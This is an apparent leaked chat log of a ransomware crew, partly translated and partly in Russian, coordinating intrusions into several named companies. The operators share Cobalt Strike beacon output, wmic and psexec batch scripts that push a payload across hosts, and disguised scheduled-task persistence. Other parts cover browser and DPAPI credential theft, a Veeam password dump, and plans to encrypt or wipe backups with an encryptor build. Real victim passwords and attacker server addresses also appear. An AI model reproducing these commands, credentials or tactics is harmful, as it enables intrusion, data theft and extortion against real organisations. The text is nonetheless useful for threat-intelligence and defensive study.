share \\DCWAS25.Wilsonart.com\IPC$ - Remote IPC \\DEVBIOBI.Wilsonart.com\ADMIN$ - Remote Admin \\DEVBIOBI.Wilsonart.com\Backups - \\DEVBIOBI.Wilsonart.com\BackupScripts - \\DEVBIOBI.Wilsonart.com\BIAPPSProjects - \\DEVBIOBI.Wilsonart.com\C$ - Default share \\DEVBIOBI.Wilsonart.com\D$ - Default share \\DEVBIOBI.Wilsonart.com\IPC$ - Remote IPC \\DEVBIOBI.Wilsonart.com\OBIEE - \\DEVBIOBI.Wilsonart.com\temp - \\EL79470W10P64.Wilsonart.com\ADMIN$ - Remote Admin \\EL79470W10P64.Wilsonart.com\C$ - Default share \\EL79470W10P64.Wilsonart.com\IPC$ - Remote IPC \\79196W10P.Wilsonart.com\ADMIN$ - Remote Admin \\79196W10P.Wilsonart.com\C$ - Default share \\79196W10P.Wilsonart.com\IPC$ - Remote IPC \\74617W7P.Wilsonart.com\ADMIN$ - Remote Admin \\74617W7P.Wilsonart.com\C$ - Default share \\74617W7P.Wilsonart.com\D$ - Default share \\74617W7P.Wilsonart.com\IPC$ - Remote IPC \\EL80143W10P64.Wilsonart.com\ADMIN$ - Remote Admin \\EL80143W10P64.Wilsonart.com\C$ - Default share \\EL80143W10P64.Wilsonart.com\IPC$ - Remote IPC \\78486W10P.Wilsonart.com\ADMIN$ - Remote Admin \\78486W10P.Wilsonart.com\C$ - Default share \\78486W10P.Wilsonart.com\IPC$ - Remote IPC \\74496W7P.Wilsonart.com\ADMIN$ - Remote Admin \\74496W7P.Wilsonart.com\B$ - Default share \\74496W7P.Wilsonart.com\C$ - Default share \\74496W7P.Wilsonart.com\E$ - Default share \\74496W7P.Wilsonart.com\IPC$ - Remote IPC \\79855W10P64.Wilsonart.com\ADMIN$ - Remote Admin \\79855W10P64.Wilsonart.com\C$ - Default share \\79855W10P64.Wilsonart.com\IPC$ - Remote IPC \\DCWAS84.Wilsonart.com\ADMIN$ - Remote Admin \\DCWAS84.Wilsonart.com\C$ - Default share \\DCWAS84.Wilsonart.com\IPC$ - Remote IPC \\DCWAS84.Wilsonart.com\Test - \\VyomLabs4.Wilsonart.com\ADMIN$ - Remote Admin \\VyomLabs4.Wilsonart.com\C$ - Default share \\VyomLabs4.Wilsonart.com\IPC$ - Remote IPC \\HQTAS73.Wilsonart.com\ADMIN$ - Remote Admin \\HQTAS73.Wilsonart.com\C$ - Default share \\HQTAS73.Wilsonart.com\D$ - Default share \\HQTAS73.Wilsonart.com\F9Data - 
\\HQTAS73.Wilsonart.com\infor - \\HQTAS73.Wilsonart.com\IPC$ - Remote IPC \\HQTAS73.Wilsonart.com\tempinstall - \\HQTAS73.Wilsonart.com\test - \\79127W10P.Wilsonart.com\ADMIN$ - Remote Admin \\79127W10P.Wilsonart.com\C$ - Default share \\79127W10P.Wilsonart.com\IPC$ - Remote IPC \\78722W7P64.Wilsonart.com\ADMIN$ - Remote Admin \\78722W7P64.Wilsonart.com\C$ - Default share \\78722W7P64.Wilsonart.com\IPC$ - Remote IPC \\73339W7P.Wilsonart.com\ADMIN$ - Remote Admin \\73339W7P.Wilsonart.com\C$ - Default share \\73339W7P.Wilsonart.com\IPC$ - Remote IPC \\74211W7P.Wilsonart.com\ADMIN$ - Remote Admin \\74211W7P.Wilsonart.com\B$ - Default share \\74211W7P.Wilsonart.com\C$ - Default share \\74211W7P.Wilsonart.com\IPC$ - Remote IPC \\78229W7E64.Wilsonart.com\ADMIN$ - Remote Admin \\78229W7E64.Wilsonart.com\C$ - Default share \\78229W7E64.Wilsonart.com\IPC$ - Remote IPC \\77831W7P.Wilsonart.com\ADMIN$ - Remote Admin \\77831W7P.Wilsonart.com\C$ - Default share \\77831W7P.Wilsonart.com\IPC$ - Remote IPC \\73368W7P.Wilsonart.com\ADMIN$ - Remote Admin \\73368W7P.Wilsonart.com\C$ - Default share \\73368W7P.Wilsonart.com\E$ - Default share \\73368W7P.Wilsonart.com\IPC$ - Remote IPC \\TNTAS08.Wilsonart.com\ADMIN$ - Remote Admin \\TNTAS08.Wilsonart.com\C$ - Default share \\TNTAS08.Wilsonart.com\Extract - \\TNTAS08.Wilsonart.com\HP Officejet Pro K550 Series \\TNTAS08.Wilsonart.com\IPC$ - Remote IPC \\TNTAS08.Wilsonart.com\print$ - Printer Drivers \\TNTAS08.Wilsonart.com\Ricoh Aficio MP C2500 PCL6 \\TNTAS08.Wilsonart.com\Users - \\ED79126W10P.Wilsonart.com\ADMIN$ - Remote Admin \\ED79126W10P.Wilsonart.com\C$ - Default share \\ED79126W10P.Wilsonart.com\IPC$ - Remote IPC \\73747W7P.Wilsonart.com\ADMIN$ - Remote Admin \\73747W7P.Wilsonart.com\C$ - Default share \\73747W7P.Wilsonart.com\IPC$ - Remote IPC \\73747W7P.Wilsonart.com\print$ - Printer Drivers \\DRWAS07.Wilsonart.com\ADMIN$ - Remote Admin \\DRWAS07.Wilsonart.com\C$ - Default share \\DRWAS07.Wilsonart.com\IPC$ - Remote IPC 
Shares
No
Did you get out from the entry point?
Not yet
Found a DA?
FAMIXXP
user9> wilsonart\rockwell > VantgagePoint
```
beacon> shell net use * \\DCWAS08.wilsonart.com\C$ VantgagePoint /user:wilsonart\rockwell
[*] Tasked beacon to run: net use * \\DCWAS08.wilsonart.com\C$ VantgagePoint /user:wilsonart\rockwell
[+] host called home, sent: 106 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.
```
Reposting:
```
====== AntiVirus ======
Engine : Symantec Endpoint Protection
ProductEXE : C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\14.2.5569.2100.105\Bin\WSCSavNotifier.exe
ReportingEXE : C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\14.2.5569.2100.105\Bin64\sepWscSvc64.exe
```
Domain Controllers:
DC
And where are the EA, DC, LA, DA lists?
And check 1 against ad_users
Got it
Like, don't run the batch file with 6 commands
Check one command at a time
But I advise you
To be sure
Yeah, dump everything
Seems like it got dumped
Seems like with the quarantine it will turn out like in the last network
Don't touch it at all, or try to remove it?
+ quarantines
It trusts itself 7 times over there
Well, there are many fewer of them here
And Kerb too
There)
A trust is a trust for that reason (depending on the links between them)
Got it
Okay
And trusts can be dumped even without admin rights
Therefore
without any brain-fuckery
Same as me
There's no one to move around inside the network with yet
OK, I understand you're worn out
into the trusts
We'll see the rest in the process
Theoretically yes, provided your wmic works domain-wide
Just need to insert the creds
Well, it all works out
possible ones
Calling piped commands in a batch file works more reliably if you specify the creds, it minimizes bugs
Not like that under the token
Plus I'd add DA creds to the wmic launch just in case
Change it to cmd /c
Clear, got it, remove run
rather than
it'll launch
What even is "run"?
Why run?)
And fixed it incorrectly
I fixed it there
ok
C:\starter.exe
And by the way, better to copy straight to the root
psexec_command wmicexec_command (I don't remember the exact name of the msf module, but something like that), they both even accept hashes if there are no cleartexts at hand
any way
and then launch them
You can just spread the files with the "first part" of the batch file
Can do it with psexec too
But you can do it with wmic as DA, that'll "work"
wmic is simpler, though it won't launch as SYSTEM
Is schtasks mandatory?
Wouldn't it be easier to launch this exe with wmic?
The second part, with schtasks, is terrible
The first part is ok
in files
I had it from somewhere
Well okay
no.
no?
It's like right on msdn
But you wrote this
Did you at least read the schtasks syntax?
Some nonsense entirely
No, it won't, obviously
Will it live?
```
for /F %%i in (C:\ProgramData\hostlist.txt) do @ copy C:\ProgramData\starter.exe \\%i\C$\Windows\System32\starter.exe && wmic /node:%%i /user: /password: process call create "cmd /c C:\Windows\System32\starter.exe" && ping %%i -n 3 >> .\ping.txt
```
@tl2 add me to fusionfirst.local
Create a chat please - fusionfirst.local
+
slypad has gone down
Send it, we have to wait anyway until the workday ends in Texas
slypad.com:443
++
Does anyone need a fresh, empty little network?
The output can be changed to csv to make it more convenient
Have a calm time of day)
Until tomorrow
Of course, rest
Maybe that's all for today?
Because we're already falling asleep, our heads aren't working...
And in general, what I meant about a "sensitive" network: I rather meant serious event monitoring, where the whole network is covered by EDR agents, monitoring systems and other nasties
And again... hacking is "not a static" thing, something will open up
which barely differs from real AD
Azure clouds provide their own Azure AD right out of the box
Microsoft is moving in the direction of pushing its clouds first of all
if we're talking about a "not small" network
With such settings you can't administer, roughly speaking
Such a network simply won't work
@user1 what you described is impossible in practice
Surrender, enemy, freeze and lie down
For now we work very little with "sensitive" networks, but when it comes to those... anyway, you already understand yourselves that you can "break everything" even from a VPN. And sometimes that's the only method...
There will be many cases when this is required
in that it can be used outside the context of specific users, manipulating the file system and the domain even remotely
Huge plus
You need to figure it out yourself, guides are out of place here
a bit "direct" like that
because it's one of the key mechanisms for storing creds
The essence of DPAPI attacks in general
That question you should ask yourself))))
Rhetorical question :grin:
Why the fuck did I extract this masterkey all night and got nothing in the end
Any other questions, throw them in
Everyone into sprouselaw
I'll add)
Tell me whom to add where
Perhaps it's time to add all of us to this chat
Well, nobody added us there for some reason
@user7 if this relates to some network, please post it in the corresponding chat
enjoy
https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM/
mimikatz can do that
Yep
Back to a known one?
No, the password is fine.
But how to change the hash?
Different ways, with powershell, or just via cmd
I don't even know how to be more detailed)) change the user's password) lol, or is the question how it's more convenient to do it?
Can you elaborate))
to the hash he had
and then change it back
log in as him
even 1qwerty1
I looked for configs, didn't find them(
You can set the user an NTLM hash of any known cleartext password
> Well, then we look for cleartext, plus you can set the user your own password hash and then change it back
I thought I wrote it clearly.
Did you look for configs of Password Plus itself?
Can't log in as the needed user with NTLM
and deploying it at our place
ending with a full download of the folder with the client
A million options
What "no"? Did you try to log in via RDP where the client is installed?
> Well, then we look for cleartext, plus you can set the user your own password hash and then change it back
No cleartext for RDP, and it doesn't connect with NTLM
no
RDP?
The client seems to send to the cloud
@user9 a cloud with web authentication?
With cloud ones, we look for a login to the cloud and wipe there; it's simple: if it can't be wiped, then it can't
Well, nothing on our network yet... went through all the computers, the guys don't leave passwords in chrome\files, there's Passwords Plus, seems they store passwords there, but it's cloud and you can't fucking get it either
BUT you can fight with them too, they are sometimes accessible through some interface and you can wipe all the cassettes, the cabinet even has a degaussing function sometimes)
These are cold tape backups
Probably the hardest, and often unsolvable
And they usually have ABSOLUTELY EVERYTHING related to AV/backups/server catalogs
Most often all this is managed by 3-4-5 people even in large networks
THE MAIN and most important thing! is studying the contents of machines/home dirs/browsers of IT people
Here only with acquired experience will you figure out how to work with them; essentially, we see what's installed aaand... well, we just read the docs...
veeam, acronis, ironmount etc.
Practically everywhere +- the same backups are used
In general, regarding backups
@user9 yes. Here's an example of a backup
Damn, well got it, yeah, java eats it up.
We'll solve it
4 GB max here
2x24x4 sticks?
The computers are ancient
Uh-huh
16 gigs total?
ddr2??????
We have ddr2 at 4G each, no more slots. And some motherboards don't support more
Yeah?
```
Acronis Backup 11.7 Management Console 11.7.50058
```
Worse than explorer on windows, damn. Okay, heard you about the RAM
A Raspberry Pi works faster
Got it
Fucking java eats everything
RAM
ram runs out
@user3 what's lacking in the configs? What does System Load show? Is it eating RAM?
:zany_face:
The computers freeze demonically! You can't just open a browser, Cobalt and notepad!
You have three now I think, need more? If yes, tell me which servers and how many you need
As needed
So, gentlemen, on the questions:
1. smb_login with creds against the DC / net use against the DC / login to Outlook or webmail (if domain authentication is tied in) / ldap_login (https://github.com/lanjelot/patator), for example with patator
2. The first part is the rudimentary LM hash, you can safely forget what it is, for us it was and always will be the same; the second is the NTLM hash, the one we actually use most often for authentication
3. Will come later, you'll be able to submit tasks through the admin panel for hash decryption and brute-forcing keepass/doc/excel files
4. https://github.com/0xthirteen/StayKit - all persistence techniques are described here, split by category and by privilege level; there's nothing more to spell out in detail, there have been no "unique" techniques for Windows systems for years. There are alternative things like webshells on web servers (that's aspx code placed on the web server, in this case IIS where a functional application "lives"; most often and most conveniently uploaded to Exchange), there's an IIS module. For now stick with StayKit because it gives understanding; later I'll just give you a convenient persistence tool that works simply by launching a dll
5. Everything in the network is administered by people. The key to getting the most detailed data about the information system under study is with the admins/network engineers. That's diagrams, accesses and everything else. Cloud or taped backups can be determined only through them or by indirect signs (services/tasks on critical servers, records in AD, etc.)
6. The question is incorrect. It doesn't "need" to be done; smb_pipe is essentially just a kind of payload which is +- technically equal to a bind payload in metasploit, used for machines with authorization restrictions or for machines that can't call out externally over the standard http(s)/dns/tcp protocol, i.e. jump psexec(_psh) 10.0.0.1 pipe is the creation of a service for a bind pipe through which the initiating machine will later connect
7. I'll give out a builder for the files
8. You have three now I think, need more? If yes, tell me which servers and how many you need
9. And what's freezing? I'm not aware.
`SPROUSELAW\administrator 1ylft1tmtS_6963`
Here?
Yes
Here?
All fine, it stopped lagging
I got kicked out of the new rocket
Not alive
I'll take it
Session is alive
Take it now
Into the VPN
No access
1. https://50.233.57.77 2FA, nothing in bookmarks, backup codes don't work
Here try adding your own bookmark
> 1. https://50.233.57.77 2FA, nothing in bookmarks, backup codes don't work
2. https://173.247.171.106 - #grantweber-com there's access to the NAS and to the AV, none to vSphere, searched everywhere, we can close it
172.81.67.174 (retif.com) no creds for the NAS
Which of them are in progress (send the IPs) and at what stage, or for what reason not in progress
I handed out 3 VPNs
So advise
Rest
Friends, I really want to sleep, got stuck hard today, I'll be back in about 4 hours; if I'm completely out, lock without me, it's unlikely there'll be much there, I took a quick look
Tell @tl1 tomorrow, he'll order a new one and sort this one out if there's trouble)
Or a new domain, I dunno)
Fix cobalt please
Or it hangs for 5 minutes, then resets again
user4's sessions are alive; re-entering cobalt resets the counter
I seem to have problems with the cobalt domain
Post the list of all LAs from everywhere you dumped to the group
Yes, almost the same everywhere and they don't work on servers
Dumped LAs from all 10?
10 +-
And how many user ones?
And just check net view on that host
But it goes to user ones
And to user ones?
Write the new password in DM
No access to change the password
Well, where it says he has access to the admin$ remote shares etc.
From which servers?
Without a domain it didn't seem to let us in, but we dumped users from servers, and this user and his group aren't there
Without a domain?
Yes, it says just a user
What does smb_login say on these hosts?
Did you check all the hosts?
user8 no, I won't say the parameters, but the context was a micro-admin (nddevbernst)
And what was the context at launch and the parameters?
But it doesn't go there at all
That there are admin shares in many places
The output was above
user8 ran it, all the outputs
Didn't work lol
And you hadn't run it before?
There are 20500 PCs there)
Invoke-ShareFinder works, but sluggishly
Visible
Is the domain visible?
```
beacon> execute-assembly /home/user/TOOLS/2/SharpShares.exe shares
[*] Tasked beacon to run .NET program: SharpShares.exe shares
[+] host called home, sent: 117815 bytes
[+] received output:
[*] Parsed 0 computer objects.
```
Can anything be done with this?
Yes
By the way, can the hashes from inway be brute-forced?))
**died of waiting**
There won't be sessions
It waits for the file in the sys32 directory and prevents its deletion
> The "poc.exe" simply waits until the file is created in our target directory and then places an oplock in order to prevent the deletion (which will fail because of sharing violations)
That's exactly what I didn't understand; it seems to move the dll into sys32 and poc runs it
Or is it a way not only to move, but also to launch
i.e. our user becomes LA on this file and gets the ability to launch from under admin
We have access rights only to this file and that's it
No, well, it lies there, fine, but we launch it as a user without rights
The other way around, i.e. it gives you user rights if you're admin?))
And not the other way around?
And in this case we have the rights to launch our file specifically from this path
The point is that this sys32 is in the admin$ share, and if you have access there, that gives you admin rights/SYSTEM
That's clear. But as I understood, the whole point of this business is to plant your file in system32 without rights. And then that fact has to be used somehow. But how is unclear. Seems you can launch applications from there that UAC doesn't complain about, but I'm not sure)
Because according to the author's article, when the ntuser.pol cycle runs it deletes the file from system32
Well, its point is that it monitors when the file is created and prevents its deletion
Well yes
Is poc.exe confusing?
As far as I understood it's very simple, but I could be wrong
Well, that's there now, but not necessarily in new sessions)
And the implementation is somewhat hazy)
I read it, but didn't find anything like that on the users' computers.
And there's SYSTEM everywhere
Has anyone checked?
Still the same at 10 +-
Current users aren't LA anywhere?
From which?
By the way, what about the AV?
Around what time?
All the same, we still can't get a DA and can't get onto the machines we're interested in
So what do we have on the current networks?
Yeah okay
Yes, a week ago +-
I gave all of you new cobalts, didn't I?
I'll tell you the time a bit later
There will be new sessions today, yes
Got it
He's here
3's computer crapped out again...
Those who are online for me now
4 7 9
user8 is a bit sick
4)
Is my rocket lagging or are there only 3 of you now?
Hi
Hi everyone
I'll clarify on the new ones now; for now let's finish working on the old ones
There's an old one, we don't know where to poke
Yes, still in the old ones. Will there be new ones?
Hi everyone) are there sessions to work with?
Hi
More precisely, changed
You said back then it was corrupted)
The same thing happened with the password
There was a case, I don't remember in which network
Then it's not corrupted
The same one
```
execute-assembly /home/input0/Cobalt/tools/Ghostpack-CompiledBinaries-master/SharpChrome.exe logins /pvk:C:\ProgramData\ntds_capi_0_93f29a7d-eed3-4c1f-99bf-ebeb7603cd2d.keyx.rsa.pvk
```
Scenario 4
https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/
Didn't get it
Maybe outdated
Unlikely it's being dumped wrong
Maybe DPAPI god mode?
Everything there is
With both chrome and chromium?
There's a user that gets through but the password can't be dumped; above I posted how it dumps wrong
```
https://login.veeam.com/,https://login.veeam.com/auth/realms/veeamsso/protocol/openid-connect/auth,21/12/2020 15:27:42,13253038062778136,londonit@ballymoregroup.com,I ?$??c$C?
```
Ah fuck
It's in the cloud
```
using System;
using System.Security.Cryptography;
using System.Text;

namespace Main
{
    internal static class Program
    {
        // Decrypts a base64-encoded DPAPI blob with the machine-scope key
        // (no optional entropy) and prints "<label>:<plaintext>".
        private static void Decrypt(string label, string base64Blob)
        {
            if (string.IsNullOrEmpty(base64Blob)) { return; }
            byte[] encryptedData = Convert.FromBase64String(base64Blob);
            byte[] plain = ProtectedData.Unprotect(encryptedData, null, DataProtectionScope.LocalMachine);
            Console.WriteLine(label + ':' + Encoding.UTF8.GetString(plain));
        }

        private static void Main(string[] args)
        {
            Decrypt("bakkeOffice", "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAGyv+yhssxEaNJF2obQfCSwQAAAACAAAAAAAQZgAAAAEAACAAAADMbPI8UL6dI5ivLmmtbfPselp0losssqbnFyWIqg29eAAAAAAOgAAAAAIAACAAAACnK/tIFTdbgO3ok5+WFnVl/d/uIE8YgcLB4YG5seXZVxAAAABLnxZoyMe7WVmWzeeRMB4CQAAAAIoDxg8RrE5TlSrxAt7CBh+arMdVWKWT0SCoWio0nUMPFXBBSP5NQ0tWZd5V8r6WzOqKWVYWOHBBocQR61bQx98=");
        }
    }
}
```
```
"c:\Program Files\Microsoft SQL Server\110\Tools\Binn\sqlcmd.exe" -S localhost,49264 -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc] FROM [VeeamBackup].[dbo].[Credentials];"
```
Anything with veeam?
Access to the server
Added to the Remote Desktop Users group
So far found it only with one user
Did you dump from the others?
We want to get in via RDP to look at the veeam creds. Alas, it doesn't let us in
Need a new cobalt
No, didn't dump
I found creds for DAs and access to the servers where the DAs and admins sit, but the creds were changed a month ago, and the ones we have are outdated(
lsadump::cache
No, I mean mscache?
```
mimikatz vault::cred
```
You mean vault?
Did you dump mscache?)
No logins signon files either
On the PC
I'm looking at another ff
The ff update comes out once a month
Updated 7 months ago I think
And the module you're using, what year is it from?
Guys
No, it seems it does use it
Give the profile listing
Maybe
He possibly has no saved logins in Mozilla
Hope with a fresh head we'll quickly sort out mozilla in the morning, somehow nothing is working today
If you have a problem with snapshots we won't be able to start tomorrow
Are we finishing tomorrow?
What do you have here?
So, guys
The profile is in appdata
If he has an active session there you'll catch it right away
Hm, just a sec
+ history
You'll get his saved passwords
Yes, and decrypt them
And plug his profile in on a local dedicated server under a socks proxy
It's simple, you need to take the profile folder itself
Super easy
mozilla
There's mozilla, and edge with explorer
That's good
No chrome
Visible, trying to see what's in the fs
Is c$ visible?
rpc is unavailable
no
Does rpc work?
I lied)) only psexec works
You said wmic
program files
Process list
And how to find out?
-
His web browser
Which
?
Then answer the question I asked an hour ago
It's not about the command. We pulled another workstation that way
`shell SCHTASKS /Create /S 10.22.0.13 /u gophersport.local\schtask /p rehpog2013! /tn "OnDemand checking" /tr "cmd.exe /c rundll32 c:\windows\system32\shc.dll entryPoint" /sc onstart /RU SYSTEM`
The dll you crafted seems to work, but the session dies very quickly
Example command
Can't pull the admin machine. winrm and wmi and psexec seem to work, but the session doesn't arrive.
The schtask is disabled, apparently: `ERROR: The request is not supported.`
So what do you have here?
So we haven't even seen the browser yet
What browser does he have?
We can't get onto the workstations, nor onto the admin ones
In his browser?
We found the vSphere, but no creds
So you did find it?
There's also a nuance with vSphere; we're trying to get onto the admins' computers
Moving on to working with colleagues
If you're 100% sure about everything here
Backups, virtualization, AV and the rest
Well, then that's great
Are you done with the network?
Is there a build?
Everything's ready already
Then it has to be prepared today, so we don't wait tomorrow
Okay
Then I think 6 will be enough
```
-size[10/15/20/25/30/35/40/45/50/60/70/80]
This parameter determines what % of a file will be encrypted (default 50%); the file is encrypted in chunks at different places. Databases are encrypted 100% and VM files 20% regardless of the parameter value.
```
Yeah, right now
Maybe he knows
Message him in DM
@tl2, maybe you know?
I have doubts about 6 hours
```
Shares for 10.2.1.21:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
RAID1
ServerHD
SSDRAID2
TIF Archive
Web
schtask
```
And I don't know the principle
There's at least one more of us, too
I think it depends at minimum on the power of the environment it's run in
But I didn't really figure out what's what there
So there are 2 large disks there
I see you have 2 labels
About 40 percent, I think
When you looked through the GUI, where was the slider?
The build most likely doesn't fully encrypt large files, right?
Again, that's not the whole volume of data
Will 6 hours be enough?
```
 Volume in drive L is DRnetapp02a
 Volume Serial Number is 802E-2DBA

 Directory of l:\

06/08/2020  03:53 PM    Backups
04/22/2016  10:00 AM    VeeamWAN
               0 File(s)              0 bytes
               2 Dir(s)  2,537,787,944,960 bytes free
```
Well, dunno
Dunno
2 TB
```
[+] received output:
 Volume in drive L is DRnetapp01a
 Volume Serial Number is AA21-9C34

 Directory of L:\
06/09/2020  09:00 PM    Backups
05/09/2019  01:49 PM    ProgramData
10/24/2016  08:24 AM    VeeamWAN
               0 File(s)              0 bytes
               3 Dir(s)  2,094,574,211,072 bytes free
```
Or whatever the label is there
Give me dir Z:\
Come on
Come on, let's not screw things up before the close
Not worth it
I remember, I'll go in over RDP now and look
TB+?
What's the disk volume there?
It seems to me that in 6 hours you can touch a hell of a lot of files
6 hours for the whole process
Well, even better
It seems it comes out to 2 at night, at 11
No
The current time is: 9:50:34.39
Give me the time from there once more
Looks like at our 11 it'll be 11 PM for them, or somewhere around that
So that the backups go through
We'll have to start early tomorrow morning
If it comes to that
Yeah
In any case, check the server for AV
Maybe it's him...
Well, I think we should also cut down WinDef before starting
Most likely from those there'll only be sessions; the rest are in the map
Here, look how many are without AV
`[+] No EDR products found! Operate at your own risk!`
Check EDR where you tried
Well. I remember. It dropped off just today
Because I pulled it in myself
Hm, the print server pulled in
Try it
There is such a server there
z1print
Then it doesn't work
With two
The DLL with the stay flag?
And check the DLL
Well, we're continuing to search anyway
You have a chance to check everything, because tomorrow there won't be time for it
Not certain there is
Yeah, dunno. I think it's Veeam storing there. And the hypervisors aren't visible at all
So our virtualization stores snaps on that disk?
To check that it works
To start with, pull 1-2 servers into the Cobalt via the DLL
If you sort it out, 2 could be closed
There's one more network on the way
But not just sitting and waiting
Had to stay until 2-3 at night
Yeah
It's 9 AM for them, the workday just started
Also an option
Then let's start tomorrow morning?
No options here
Uh-huh
Damn, are we going to close at night again?
If we start under the admins' noses they'll just reboot everything, and that disk of who-knows-how-many GB won't even get half encrypted
We won't start right now anyway, it's their workday
I'll hand it out closer to the start
The build?
Better, I'll rebuild it locally in the encryptor, a definitely working variant
Let's do shellcode
We're in the old one
Did Cobalt 4.2 start up? Or are you working in the old one?
или вобще через впн?щас скинуя конечно не на 100% уверен, но выглядит это как диск подключенный к виам уан.[ ](https://mediaeveryone.com/group/gophersport-com?msg=zs9ACCiTbycvsjNsy) если сторонняя инфа имеется то не стоитможно попробоватьесть предложение его форматнуть и дефрагментиваротьтам весь диск это бэкапы?The current time is: 9:11:35.49скажи мне там еще время сейчасга тогда в шифрвиндакакая ОСа диски опять таки лежали где?но такой объем будет долго шифроватьсявсегоскорее всгеоя так думаю лучше пошифровать, а то удаленные можно восстановитьконечно)у нас доступ к этому диску ест ь?там интересная система - есть такая хрень veeam one называется. я в ее админку залез, поспотрел что как и нашел два сервака у которых диском Д (условно) подключены винты на дохера гигабайт и вот на них и лежат бэкапы[ ](https://mediaeveryone.com/group/gophersport-com?msg=eYeeFtaRDpCZgE3Qy) сканеры не дремлют)а они где лежат?ага, вспомнил... бэкапы виртуалок мы нашл, а вот что лучше удалить их, или пошифровать?в мсфвпска кстати тоже паленая походу, постоянно левые сесси прилетают и отваваютсяну в мою новую кобу вообще ничего не летит)но скорее всего щас выдам 3 кобы на 4.2решаю вопросвозможно кобы паленые - поэтому..ну трендмикро не такой и кусачийдругое дело)`[+] Trend Micro Inc Found!`ну точно же))он могет и в ремот смотретьа зач?так не на одну арму не зайти..а edr_query что говорит?может на новые кобы пропустит...на армах, стоит что хер пойми что, режет сессии только в путь[ ](https://mediaeveryone.com/group/gophersport-com?msg=A5hdqvaiMJhC3JSm2) а, это да[ ](https://mediaeveryone.com/group/gophersport-com?msg=dD7JqrCAaEKriCqkx) я про этонет sharsharesсерьезно? шарпснайпер сработал?``` Administrator backup erictitchenal ilssql mattpeterson o365sync schtask symbackup trackit veeambackup veeamone watchguard User: erictitchenal - IP Address: 10.22.0.10 (r90sflx3) User: mattpeterson - IP Address: 10.22.0.13 10.10.0.54 (itvm1) (z1ftp) `````` gophersport.local\schtask rehpog2013! 
gophersport.local\symbackup rehpog2013! gophersport.local\veeambackup rehpog2013! gophersport.local\veeamone KA7KYbbmDC5LMmn ```зайди пока к @user4 тогдапроверь настройки листамы так и делалиага, дозапускались, что сесии отвалисья тебя так и запускалтак закинь его дллчет не летят сесии от user4а ты для @user9 не можешь заспавнить сессию, как мне делал?сейчас уточню времяпока готовых больше нет23.106.160.195 моя)`` CobaltStrike C2s on Port 443 - Pastebin.com pastebin.com ' ... 34.233.187.38. 54.74.109.48. 209.159.207.46. 197.248.104.2. 152.160.171.27. 98.143.95.83. 64.139.73.173. 23.106.160.195. 205.201.245.170. 201.35.17.221. ```мне тоже наверно дай, а тоже процентов 20 притягиваетсялсно 4.2естьагатвоя?)ну и +)Есть читсые кобы? моя видимо засветилась, не летят сессииuser9+Отпинговал серваки и армы. Нашел бэкапы. АД перснять не получается даже на ДК, но там, в основном, ничего не поменялось. Остается выяснить, что с виртуализацией, рассортировать серваки и можно закрывать - поэтому закажи билд, может сегодня и закроемда, тут уже все готово к след стадии)та я же дисинк снял)тут вон я скуль админа скинул там стопудово ДА будет где-нибудь на скуль сервакетут уже вылез за пределы входной точки и хорошочем больше соберете себе пул работы на потом тем лучшеладноты пока сетку разбери до состояния ДАмы закрывать не будем`` kbhost2.korbel.com ESXI 5.5 kbhost1.korbel.com ESXI 5.5 colohost2.korbel.com ESXI 5.5 kbhost3.korbel.com ESXI 5.5 colohost1.korbel.com ESXI 5.5 kb-hqucs1.korbel.com Virtual Host Servers vcenter.korbel.com VCENTER ``+ ав[ ](https://mediaeveryone.com/group/korbel-com?msg=xkdmqByZWcpbzcnan) да я пока креды сферы поищу`` $krb5tgs$23$sqladmin$korbel.com$MSSQLSvc/cognos2.korbel.com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 ```можешь пока взять еще сетку в работезабери ток хешидавай)ок, пока сетку буду разбиратьну если бы не затупил, то на 3 минуты)да ладно как видишь делов на 3 минуты:skull_crossbones:молодецвседаэто уже новый да?``` Folder: \ 
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Adobe Acrobat Update Task                12/21/2020 1:00:00 PM  Ready
AM Transformer Cube Builds               12/22/2020 6:00:00 AM  Ready
Microsoft SvcRestartTask#23731           12/21/2020 12:56:24 PM Ready
```
Did you do it?
And with schtask as SYSTEM
You disguise it under a canonical name
You hide it in system32
Delete the old DLL
Delete that schtask on that machine
Sorry, I lost my temper here too
Okay
On the server
My head's just swimming, sorry
And from the user dir
It runs as the user
Yes, there is
OK
Delete the schtask
```
Microsoft autoupdate#94110
```
Got it
```
Microsoft autoupdate#94110               12/21/2020 12:51:30 PM Ready
```
The DLL is launched with rundll and creates the task itself
```
Folder: \
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Adobe Acrobat Update Task                12/21/2020 1:00:00 PM  Ready
AM Transformer Cube Builds               12/22/2020 6:00:00 AM  Ready
Microsoft autoupdate#94110               12/21/2020 12:51:30 PM Ready

Folder: \Microsoft
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
INFO: There are no scheduled tasks currently available at your access level.

Folder: \Microsoft\Configuration Manager
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Configuration Manager Health Evaluation  12/22/2020 12:09:37 AM Ready

Folder: \Microsoft\Microsoft Antimalware
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Microsoft Antimalware Scheduled Scan     12/26/2020 2:00:12 AM  Ready

Folder: \Microsoft\Office
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Office 15 Subscription Heartbeat         12/22/2020 6:33:22 AM  Could not start

Folder: \Microsoft\Windows
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
INFO: There are no scheduled tasks currently available at your access level.

Folder: \Microsoft\Windows\Active Directory Rights Management Services Client
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
AD RMS Rights Policy Template Management                        Disabled
AD RMS Rights Policy Template Management N/A                    Ready

Folder: \Microsoft\Windows\AppID
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
PolicyConverter                          N/A                    Ready
VerifiedPublisherCertStoreCheck          N/A                    Ready

Folder: \Microsoft\Windows\Application Experience
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
AitAgent                                 12/22/2020 2:30:00 AM  Ready
